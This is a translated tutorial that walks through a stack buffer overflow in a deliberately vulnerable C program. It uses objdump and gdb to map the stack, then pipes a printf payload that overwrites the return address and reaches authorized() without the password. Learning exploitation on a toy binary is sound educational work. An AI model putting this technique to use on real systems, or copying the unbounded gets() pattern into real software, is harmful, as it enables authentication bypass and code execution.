Try this as an experiment: a simple buffer overflow

Blast, 2014/04/16

From: www.spectrumcoding.com/tutorials/e… This is an informal translation: it follows the original throughout, with a little embellishment. Where the text gets stuck or the author is unclear, I have added notes inline; you will see them marked =v=.

0x00 Background

I’m not a full-time security person, but I did read something recently and found it very interesting.

I came across these articles on buffer overflows at wiki.osdev.org/Expanded_Ma… while I was developing my own operating system.

So I'm going to write a short introduction to buffer overflows in C programs. The reason is simple: I have learned these things, and I want you to try them in practice.

Today we are going to analyze a program that requires the correct password to pass authentication. After authentication, the program calls the authorized() function.

However, if we have forgotten the password or never knew it, we will have to get authorized() called by way of a buffer overflow.

0x01 Details

So, let's get down to business. First, you should know what a stack is. If not, go to wiki.osdev.org/Stack. In simple terms, it is a LIFO (last in, first out) structure that grows from high addresses toward low addresses. I will explain this as we walk through the vulnerable program.

#!cpp
#include <stdio.h>
#include <string.h>  /* strcmp() */
#include <crypt.h>   /* crypt(); link with -lcrypt */
const char pass[] = "$1$k3Eadsf$blee.9JxQ75A/dSQSxW3v/"; /* Password hash */
void authorized() {
  printf("You rascal you!\n");
}

void getInput() {

  char buffer[8];
  gets(buffer);  /* deliberately unsafe: no bounds checking */

  if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) {
    authorized();
  }
}

int main() {

  getInput();
  return 0;
}

The code is simple. The user enters a password, the program hashes it with crypt(), compares the result to the hash stored in the program, and if they match, calls the authorized() function. Think of authorized() as standing in for something sensitive that the user does after logging in (although in this example we only print a string). So, let's compile it and see what happens.

#!bash
~/D/p/overflow> gcc -ggdb -fno-stack-protector -z execstack overflow.c -lcrypt -o overflow
overflow.c: In function 'getInput':
overflow.c:12:2: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations]
  gets(buffer);
  ^
~/D/p/overflow> ./overflow
password
~/D/p/overflow>

The program allocates an 8-byte buffer, stores the user’s input into the buffer, and then calls a function to encrypt it and compare it with the password in the program.

When we compile, the compiler warns us that gets() is unsafe, and it is: it does no bounds checking at all, so that is what we will use to trigger the vulnerability.

Let’s use objdump to dump the generated machine code and see what it does here:

#!bash
~/D/p/overflow> objdump -d -M intel blog

#!bash
blog:     file format elf64-x86-64

Disassembly of section .init:
...
Disassembly of section .plt:
...
Disassembly of section .text:
....

00000000004006a0 <authorized>:
  4006a0: 55                    push   rbp
  4006a1: 48 89 e5              mov    rbp,rsp
  4006a4: bf e2 07 40 00        mov    edi,0x4007e2
  4006a9: e8 a2 fe ff ff        call   400550 <puts@plt>
  4006ae: 5d                    pop    rbp
  4006af: c3                    ret

00000000004006b0 <getInput>:
  4006b0: 55                    push   rbp
  4006b1: 48 89 e5              mov    rbp,rsp
  4006b4: 48 83 ec 10           sub    rsp,0x10
  4006b8: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006bc: 48 89 c7              mov    rdi,rax
  4006bf: e8 dc fe ff ff        call   4005a0 <gets@plt>
  4006c4: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006c8: be f2 07 40 00        mov    esi,0x4007f2
  4006cd: 48 89 c7              mov    rdi,rax
  4006d0: e8 8b fe ff ff        call   400560 <crypt@plt>
  4006d5: 48 89 c6              mov    rsi,rax
  4006d8: bf c0 07 40 00        mov    edi,0x4007c0
  4006dd: e8 9e fe ff ff        call   400580 <strcmp@plt>
  4006e2: 85 c0                 test   eax,eax
  4006e4: 75 0a                 jne    4006f0 <getInput+0x40>
  4006e6: b8 00 00 00 00        mov    eax,0x0
  4006eb: e8 b0 ff ff ff        call   4006a0 <authorized>
  4006f0: c9                    leave
  4006f1: c3                    ret

00000000004006f2 <main>:
  4006f2: 55                    push   rbp
  4006f3: 48 89 e5              mov    rbp,rsp
  4006f6: b8 00 00 00 00        mov    eax,0x0
  4006fb: e8 b0 ff ff ff        call   4006b0 <getInput>
  400700: b8 00 00 00 00        mov    eax,0x0
  400705: 5d                    pop    rbp
  400706: c3                    ret
  400707: 66 0f 1f 84 00 00 00  nop    WORD PTR [rax+rax*1+0x0]
  40070e: 00 00

I kept only the parts we are interested in and had objdump print the disassembly in Intel syntax. Let's start with the main function, because that makes more sense to us (better than starting with __libc_start_main and the rest).

#!bash
00000000004006f2 <main>:
  4006f2: 55                    push   rbp
  4006f3: 48 89 e5              mov    rbp,rsp
  4006f6: b8 00 00 00 00        mov    eax,0x0
  4006fb: e8 b0 ff ff ff        call   4006b0 <getInput>
  400700: b8 00 00 00 00        mov    eax,0x0
  400705: 5d                    pop    rbp
  400706: c3                    ret
  400707: 66 0f 1f 84 00 00 00  nop    WORD PTR [rax+rax*1+0x0]
  40070e: 00 00

So what is going on here? First, the RBP register is pushed onto the stack, and then RBP is overwritten with the contents of RSP. If we look at the beginning of the other functions, we see the same thing:

#!bash
00000000004006a0 <authorized>:
  4006a0: 55                    push   rbp
  4006a1: 48 89 e5              mov    rbp,rsp
  ...
00000000004006b0 <getInput>:
  4006b0: 55                    push   rbp
  4006b1: 48 89 e5              mov    rbp,rsp
  ...

This is called the function prologue (function initialization), and of course the function has a matching epilogue at the end. First the current base pointer (RBP) is pushed onto the stack, and then the base pointer is set to the address of the current top of the stack (RSP).

Each saved base pointer points to the base of the previous stack frame, so the frames form a chain that runs all the way down the stack. This allows a program to trace the stack when an error occurs, since each base pointer leads to the beginning of the next stack frame.

A stack frame is a piece of memory on the stack used by one function call. It contains the parameters (note: on 64-bit systems, parameters that are passed in registers may not appear on the stack at all), the return address, and the local variables. I borrowed a picture from the Wikipedia article, which you can see at: en.wikipedia.org/wiki/Call_s…

The names vary, but the situation is the same: the stack grows down, so a function's return address sits at a higher address than its local variables. Let's go back to our main function and see what that means for us. After the function prologue, there is a mov eax,0x0 instruction, after which our getInput() function is called.

#!bash
00000000004006b0 <getInput>:
  4006b0: 55                    push   rbp
  4006b1: 48 89 e5              mov    rbp,rsp
  4006b4: 48 83 ec 10           sub    rsp,0x10
  4006b8: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006bc: 48 89 c7              mov    rdi,rax
  4006bf: e8 dc fe ff ff        call   4005a0 <gets@plt>
  4006c4: 48 8d 45 f0           lea    rax,[rbp-0x10]
  4006c8: be f2 07 40 00        mov    esi,0x4007f2
  4006cd: 48 89 c7              mov    rdi,rax
  4006d0: e8 8b fe ff ff        call   400560 <crypt@plt>
  4006d5: 48 89 c6              mov    rsi,rax
  4006d8: bf c0 07 40 00        mov    edi,0x4007c0
  4006dd: e8 9e fe ff ff        call   400580 <strcmp@plt>
  4006e2: 85 c0                 test   eax,eax
  4006e4: 75 0a                 jne    4006f0 <getInput+0x40>
  4006e6: b8 00 00 00 00        mov    eax,0x0
  4006eb: e8 b0 ff ff ff        call   4006a0 <authorized>
  4006f0: c9                    leave
  4006f1: c3                    ret

We can see a similar function prologue, followed by some interesting instructions before the call to gets(). Let me show you the C code again:

#!cpp
void getInput() {

  char buffer[8];
  gets(buffer);

  if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) {
    authorized();
  }
}

The stack is extended by 16 bytes (sub rsp,0x10), after which RAX is loaded with the address of the new top of the stack (rbp-0x10). What is this about? Our buffer is only 8 bytes, yet 16 bytes of space are reserved. This is because the x86 SSE (Streaming SIMD Extensions) instructions require data to be aligned to 16 bytes, so the extra 8 bytes are there purely for alignment, which quietly grows our space to 16 bytes.

After lea rax,[rbp-0x10] and mov rdi,rax, RDI holds the address rbp-0x10, which is the start of the aligned area that gets() will write into. As you can see, the stack grows downward, but the buffer is filled upward, from the top of the stack (rbp-0x10) toward RBP.

So what is all this talk leading up to? The goal is to get the authorized() function to run. To do that, we can change the return address of the current function directly to the address of authorized().

When the call instruction is executed, RIP (the instruction pointer), which holds the return address, is pushed onto the stack. This is why the stack is aligned to 16 bytes only after push rbp: the return address is just 8 bytes long, and the saved RBP supplies the other 8 bytes. Let's load our program in gdb and see what happens on the stack:

#!bash
~/D/p/overflow> gdb overflow
GNU gdb (GDB) 7.6
Copyright (C) 2013 Free Software Foundation, Inc.
GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/cris/Documents/projects/overflow/overflow...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
  0x00000000004006f2 <+0>:  push   rbp
  0x00000000004006f3 <+1>:  mov    rbp,rsp
  0x00000000004006f6 <+4>:  mov    eax,0x0
  0x00000000004006fb <+9>:  call   0x4006b0 <getInput>
  0x0000000000400700 <+14>: mov    eax,0x0
  0x0000000000400705 <+19>: pop    rbp
  0x0000000000400706 <+20>: ret
End of assembler dump.

We want to see the stack as soon as we enter main(), so we set a breakpoint at push RBP and start the program to dump the stack:

#!bash
(gdb) b *0x00000000004006f2
Breakpoint 1 at 0x4006f2: file overflow.c, line 19.
(gdb) start
Temporary breakpoint 2 at 0x4006f6: file overflow.c, line 21.
Starting program: /home/cris/Documents/projects/overflow/overflow

Breakpoint 1, main () at overflow.c:19
19 int main() {
(gdb) x/8gx $rsp
0x7fffffffe6f8: 0x00007ffff7818a15  0x0000000000000000
0x7fffffffe708: 0x00007fffffffe7d8  0x0000000100000000
0x7fffffffe718: 0x00000000004006f2  0x0000000000000000
0x7fffffffe728: 0xab4f0bd07ac4a669  0x00000000004005b0

So we can see that the stack is not aligned to 16 bytes yet. We have just entered main through a call, so we expect the value at the top of the stack to be main's return address. To verify this, we can disassemble the code around that address. Let's look at __libc_start_main; I have deleted all the irrelevant output.

#!bash
Dump of assembler code for function __libc_start_main:
  ...
  0x00007ffff7818a0b <+235>: mov    rdx,QWORD PTR [rax]
  0x00007ffff7818a0e <+238>: mov    rax,QWORD PTR [rsp+0x18]
  0x00007ffff7818a13 <+243>: call   rax
  0x00007ffff7818a15 <+245>: mov    edi,eax
  0x00007ffff7818a17 <+247>: call   0x7ffff782ecd0 <exit>
  ...
End of assembler dump.

At address 0x00007ffff7818a15 there is mov edi,eax, followed by a call to exit(). EAX holds the return value of main, which is passed to exit() as the exit code. So we have confirmed that the top of the stack is the return address of our main. RBP is null at this point, so after main's push rbp the two qwords at the top of the stack are 0x0000000000000000 and 0x00007ffff7818a15. We continue, then set a breakpoint inside getInput() and stop there:

#!bash
(gdb) disas getInput
Dump of assembler code for function getInput:
  0x00000000004006b0 <+0>:  push   rbp
  0x00000000004006b1 <+1>:  mov    rbp,rsp
  0x00000000004006b4 <+4>:  sub    rsp,0x10
  0x00000000004006b8 <+8>:  lea    rax,[rbp-0x10]
  0x00000000004006bc <+12>: mov    rdi,rax
  0x00000000004006bf <+15>: call   0x4005a0 <gets@plt>
  0x00000000004006c4 <+20>: lea    rax,[rbp-0x10]
  0x00000000004006c8 <+24>: mov    esi,0x4007f2
  0x00000000004006cd <+29>: mov    rdi,rax
  0x00000000004006d0 <+32>: call   0x400560 <crypt@plt>
  0x00000000004006d5 <+37>: mov    rsi,rax
  0x00000000004006d8 <+40>: mov    edi,0x4007c0
  0x00000000004006dd <+45>: call   0x400580 <strcmp@plt>
  0x00000000004006e2 <+50>: test   eax,eax
  0x00000000004006e4 <+52>: jne    0x4006f0 <getInput+64>
  0x00000000004006e6 <+54>: mov    eax,0x0
  0x00000000004006eb <+59>: call   0x4006a0 <authorized>
  0x00000000004006f0 <+64>: leave
  0x00000000004006f1 <+65>: ret

(gdb) b *0x00000000004006b1
Breakpoint 3 at 0x4006b1: file overflow.c, line 9

(gdb) c
Continuing.

Breakpoint 3 0x00000000004006b1 in getInput () at overflow.c:9
9 void getInput() {

(gdb) x/8gx $rsp
0x7fffffffe6e0: 0x00007fffffffe6f0  0x0000000000400700
0x7fffffffe6f0: 0x0000000000000000  0x00007ffff7818a15
0x7fffffffe700: 0x0000000000000000  0x00007fffffffe7d8
0x7fffffffe710: 0x0000000100000000  0x00000000004006f2

With the earlier explanation of these elements in mind, we can verify that 0x0000000000400700 is the return address that ret will use, so that getInput() returns to main():

#!bash
...
  0x00000000004006fb <+9>:  call   0x4006b0 <getInput>
  0x0000000000400700 <+14>: mov    eax,0x0
...

Now, the next few instructions extend the stack by 16 bytes, as mentioned earlier, and then call gets(). We place a breakpoint right after gets() and continue:

#!bash
(gdb) b *0x00000000004006c4
Breakpoint 4 at 0x4006c4: file overflow.c, line 14.
(gdb) c
Continuing.
aabbccdd

Breakpoint 4, getInput () at overflow.c:14
14 if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) {
(gdb) x/8gx $rsp
0x7fffffffe6d0: 0x6464636362626161  0x0000000000400500
0x7fffffffe6e0: 0x00007fffffffe6f0  0x0000000000400700
0x7fffffffe6f0: 0x0000000000000000  0x00007ffff7818a15
0x7fffffffe700: 0x0000000000000000  0x00007fffffffe7d8

I typed in the password "aabbccdd" to make the bytes easy to spot. After returning from gets(), there are another 16 bytes on the stack "below" the previous data, because of sub rsp,0x10. These hold our buffer, and we can see that the bytes appear in reverse order, because x86 is little-endian (see zh.wikipedia.org/wiki/%E5%AD…). 0x61 is the ASCII code for lowercase a, 0x62 is b, and so on. If we type 16 a's, we can see that our data "fills up" this part of the stack:

#!bash
(gdb) b *0x00000000004006c4
Breakpoint 4 at 0x4006c4: file overflow.c, line 14.
(gdb) c
Continuing.
aaaaaaaaaaaaaaaa

Breakpoint 4, getInput () at overflow.c:14
14 if(strcmp(pass, crypt(buffer, "$1$k3Eadsf$")) == 0) {
(gdb) x/8gx $rsp
0x7fffffffe6d0: 0x6161616161616161  0x6161616161616161
0x7fffffffe6e0: 0x00007fffffffe6f0  0x0000000000400700
0x7fffffffe6f0: 0x0000000000000000  0x00007ffff7818a15
0x7fffffffe700: 0x0000000000000000  0x00007fffffffe7d8

Therefore, if we provide long enough input, we can overwrite the function's return address with the address of authorized(). Disassemble authorized() to get the address we need:

#!bash
(gdb) disas authorized
Dump of assembler code for function authorized:
  0x00000000004006a0 <+0>:  push   rbp
  0x00000000004006a1 <+1>:  mov    rbp,rsp
  0x00000000004006a4 <+4>:  mov    edi,0x4007e2
  0x00000000004006a9 <+9>:  call   0x400550 <puts@plt>
  0x00000000004006ae <+14>: pop    rbp
  0x00000000004006af <+15>: ret
End of assembler dump.

Now all we have to do is overwrite getInput()'s return address with 0x00000000004006a0. We can use printf in the shell to feed the data to the program, with \x escapes for the raw hexadecimal bytes. Since the address is stored in reverse (little-endian) byte order, we pass its bytes in reverse as well. We also need to terminate our buffer contents with 0x00 so that strcmp does not cause a segmentation fault before our function returns. The resulting printf command looks like this:

#!bash
printf "aaaaaaaaaaaaaaaaaaaaaaa\x00\xa0\x06\x40\x00\x00\x00\x00\x00" | ./overflow

That is 16 a's to fill the buffer area, then 7 more a's and a null byte (\x00) to overwrite the saved RBP, and finally our destination address, which overwrites the normal return address. If we run it, the program triggers the bug and goes straight to authorized(), even though we never typed in the right password.

#!bash
~/D/p/overflow> printf "aaaaaaaaaaaaaaaaaaaaaaa\x00\xa0\x06\x40\x00\x00\x00\x00\x00" | ./overflow
You rascal you!
fish: Process 9299, “./overflow” from job 1, “printf "aaaaaaaaaaaaaaaaaaaaaaa\x00\xa0\x06\x40\x00\x00\x00\x00\x00" | ./overflow” terminated by signal SIGSEGV (Address boundary error)

Our program then crashes, because the return address into __libc_start_main on the stack is now out of position (the RBP pushed at the beginning of main is never popped): authorized() was reached through ret rather than call, so when it returns it pops main's saved RBP, which is 0, as its return address. But we can still see that it printed "You rascal you!", so we know that authorized() really was executed.

0x02 Summary

That's it: a simple buffer overflow. Once you understand how it happens, you will find it really cool and a lot of fun. As long as data on the stack is executable, you can, for example, drop your own code into a buffer on the stack and then point the return address at that buffer, so that the process runs your code with its own privileges. With a non-executable stack this no longer works, but it is still possible to change the return address of a function, which is just as useful.

Some other links for those who want to learn more (in English, from the author): insecure.org/stf/smashst… www.eecis.udel.edu/~bmiller/ci… developer.apple.com/library/mac… www.ibm.com/developerwo…
